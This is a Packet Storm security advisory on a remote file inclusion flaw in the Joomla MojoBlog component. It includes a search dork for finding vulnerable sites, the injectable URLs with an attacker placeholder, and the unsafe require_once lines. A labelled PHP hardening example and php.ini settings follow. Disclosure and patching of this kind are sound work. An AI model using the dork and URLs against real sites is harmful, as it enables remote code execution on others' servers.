Joomla! MojoBlog Remote File Inclusion

2009-12-01T00:00:00
ID PACKETSTORM:83344
Type packetstorm
Reporter kaMtiEz
Modified 2009-12-01T00:00:00

Description

`#########################################################################  
## Joomla Component MojoBlog Multiple Remote File Include vulnerability #  
## Author : kaMtiEz (kamzcrew@yahoo.com) #  
## Homepage : http://www.indonesiancoder.com #  
## Date : November 20, 2009 #  
#########################################################################  
  
[ Software Information ]  
  
[+] Vendor : http://www.joomlify.com/  
[+] Download : http://www.joomlify.com/files/mojoblog/  
[+] version : RC0.15  
[+] Vulnerability : RFI  
[+] price : FREE   
[+] Dork : inurl:"com_mojo"  
[+] Location : INDONESIA - JOGJA  
  
#########################################################################  
  
[ Vulnerable File ]  
  
http://127.0.0.1/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]  
  
http://127.0.0.1/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]  
  
[ BUG IN ]  
  
[1] wp-comments-post.php  
  
[2] wp-trackback.php  
======================  
  
[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');   
  
[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');   
  
[ FIX ]  
  
contact me .. or aurakasih ..  
  
Joke.. ;)  
#########################################################################  
  
[ Thx TO ]  
  
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW  
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h  
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz  
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!  
  
[ NOTE ]   
  
[+] one day .. u will be mind ..  
[+] woke up, tried looking for a hole .. found one too ,, :D  
[+] aurakasih .. I need you .. haha  
[+] uncle tukulesto, when are you coming to my city ?? haha  
`
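
The [ FIX ] section above gives no patch. As an added example (not MojoBlog's or the reporter's code), one way to harden the top of both scripts is to stop trusting `$mosConfig_absolute_path` and build the include path from the script's own location. The helper names `mojo_site_root` and `mojo_config_path` are hypothetical, and the layout `<site root>/components/com_mojo/` is assumed from the URLs in the advisory.

```php
<?php
// Added example, not the component's code: replacement for the first include
// in wp-comments-post.php and wp-trackback.php.
//
// Pattern reported in the advisory, kept here only for comparison:
//   require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');
// With register_globals enabled, a request parameter of the same name
// becomes that variable, so the include target is chosen by the client.

// Hypothetical helper: site root derived from this file's directory.
// Assumes the script lives in <site root>/components/com_mojo/.
function mojo_site_root($scriptDir)
{
    $root = realpath($scriptDir . '/../..');
    return ($root === false) ? null : $root;
}

// Hypothetical helper: return the config file path only if it exists and
// still resolves inside the site root after symlinks are followed.
function mojo_config_path($root)
{
    $path = realpath($root . '/components/com_mojo/wp-config.php');
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($path === false || strpos($path, $prefix) !== 0) {
        return null;
    }
    return $path;
}

// Refuse any request that tries to supply the path variable at all.
if (isset($_REQUEST['mosConfig_absolute_path'])) {
    header('HTTP/1.0 403 Forbidden');
    exit('Restricted access');
}

// dirname(__FILE__) is used instead of __DIR__ so the code also runs on
// the PHP 4/5.2 installations this component targeted.
$root = mojo_site_root(dirname(__FILE__));
$config = ($root !== null) ? mojo_config_path($root) : null;
if ($config === null) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('Configuration not found');
}
require_once($config);
```

Independently of the code change, `register_globals = Off` and `allow_url_include = Off` in php.ini are the server-side settings that keep a request parameter from becoming `$mosConfig_absolute_path` and keep `require_once` from fetching a URL.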